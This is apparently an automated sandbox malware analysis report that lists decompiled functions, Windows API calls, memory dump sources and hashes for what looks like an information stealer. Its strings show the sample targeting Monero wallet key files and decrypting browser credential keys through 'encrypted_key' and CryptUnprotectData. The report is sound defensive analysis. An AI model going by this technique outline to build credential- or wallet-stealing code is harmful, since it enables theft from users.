                                  • Instruction Fuzzy Hash: 14F06D70A5D244EED701FBA1EC4CB5D3764E789300F20072AF005A32B2C2F96886CB12
                                  Function 007F8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F96AE,00000000), ref: 007F8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F8EF2
                                  • wsprintfW.USER32 ref: 007F8F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: ca421a35e6a0a6220d72b5b1289607088dccf6ae8127132d9fd130af49ff9fc5
                                  • Instruction ID: 34bb23f64708144b0995b99cba7a2ab7a5b9abd99b48033c8b4f5871111c3865
                                  • Opcode Fuzzy Hash: ca421a35e6a0a6220d72b5b1289607088dccf6ae8127132d9fd130af49ff9fc5
                                  • Instruction Fuzzy Hash: 64E0EC75A48309BBDB10DFE4ED0AEAD77B8EB45701F004294FD09D73A1DAB19E109BA1
                                  Function 007EA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 007EAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 007EADEC
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 007EAE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 9c149de1144fe8d61b5aea7ba6484a1796eaf2b564d5bd44756349faafe4b247
                                  • Instruction ID: 05fae5ba2ad16b40452018749bee24adecf4a018e321dbfd44e77123b027bdc8
                                  • Opcode Fuzzy Hash: 9c149de1144fe8d61b5aea7ba6484a1796eaf2b564d5bd44756349faafe4b247
                                  • Instruction Fuzzy Hash: AEE1B2B291011CEBCB04EBA4DDA6EFE7339AF54300F508555F21A72291DF386A48CB76
                                  Function 007ED500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED581
                                  • lstrlen.KERNEL32(00000000), ref: 007ED798
                                  • lstrlen.KERNEL32(00000000), ref: 007ED7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 007ED82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 2338cc5b8f72a0460bd2726f81b25a3139f108174dddf214d3679686f17c9d65
                                  • Instruction ID: 70bfb3fd682d0c8611954112ac3a8afb3d393bc7b8257f7b1f6b41549d8b2319
                                  • Opcode Fuzzy Hash: 2338cc5b8f72a0460bd2726f81b25a3139f108174dddf214d3679686f17c9d65
                                  • Instruction Fuzzy Hash: 2491D9B191010CEBCB04FBA4DDAADFE7339AF54300F504559F21A66291EF786A08CB76
                                  Function 007ED880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED901
                                  • lstrlen.KERNEL32(00000000), ref: 007EDA9F
                                  • lstrlen.KERNEL32(00000000), ref: 007EDAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 007EDB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 93157c1a9d5936b35a644e762c7f18e6c09bf19095b1084b1dc97c5ef0c4dbc0
                                  • Instruction ID: 0ef0ee301f0e3321ad8a90520333c0a10b056cbcc18ca6faa8a32207bfb35584
                                  • Opcode Fuzzy Hash: 93157c1a9d5936b35a644e762c7f18e6c09bf19095b1084b1dc97c5ef0c4dbc0
                                  • Instruction Fuzzy Hash: 9C81C8B191010CEBCB04FBA4DC6ADFE7339AF54300F404559F61A662A1EF786A09CB76
                                  Function 0085FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: d4544d6219517c5666e9ded3a7a06efe673725e03fa554991886c9a3463c8da2
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 3C51E372500606AFEB298F58C841BBA73A4FF01302F24452DEE05D6992EB31ED44DB96
                                  Function 007EA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007EA664
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: bdf0de5b68c2429f02d9fcdfc7e1ee433b5f17828fcc69b16aba738e8fedfb2c
                                  • Instruction ID: 0cb5fa2cee9e0b27238418ea6fa34358399340a472ecd4d5117193c270ab64f6
                                  • Opcode Fuzzy Hash: bdf0de5b68c2429f02d9fcdfc7e1ee433b5f17828fcc69b16aba738e8fedfb2c
                                  • Instruction Fuzzy Hash: A2514CB0A1124CEFDB24DFA4CD9ABED7776AF44344F008118FA0A5B291EB786A05CB51
                                  Function 007EF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00801678,00800D93), ref: 007EF64C
                                  • lstrlen.KERNEL32(00000000), ref: 007EF66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: bc9efdef2aeca1f6fc8e2ac4c9f5385d22d1f1344f54591132e1bdfb5ec34cd1
                                  • Instruction ID: 0cb7e7c54b812656358f590d376ad6f047b32e25100e30bcdd487f66d4e5a491
                                  • Opcode Fuzzy Hash: bc9efdef2aeca1f6fc8e2ac4c9f5385d22d1f1344f54591132e1bdfb5ec34cd1
                                  • Instruction Fuzzy Hash: 9551B1F191020CEACB04FBA4DD5ADFD7379AF54340F408568F51A67291EF386A19CB62
                                  Function 007F37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 6bbff8b90d77023f9c1f5569148e0b52191746353da9ddae134573838702f6b5
                                  • Instruction ID: f322d28e857f982b250aadafe68531d6906842670c8c965a07938bf4752aae81
                                  • Opcode Fuzzy Hash: 6bbff8b90d77023f9c1f5569148e0b52191746353da9ddae134573838702f6b5
                                  • Instruction Fuzzy Hash: 0141FCB1D00209EFCF04EFA4D859AFEB779AF54314F008118F61676291EB78AA05CFA1
                                  Function 007EA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007EA489
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                    • Part of subcall function 007EA210: LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                    • Part of subcall function 007EA210: LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
                                    • Part of subcall function 007EA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007EA2D4
                                    • Part of subcall function 007EA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 007EA2F3
                                    • Part of subcall function 007EA2B0: LocalFree.KERNEL32(?), ref: 007EA323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
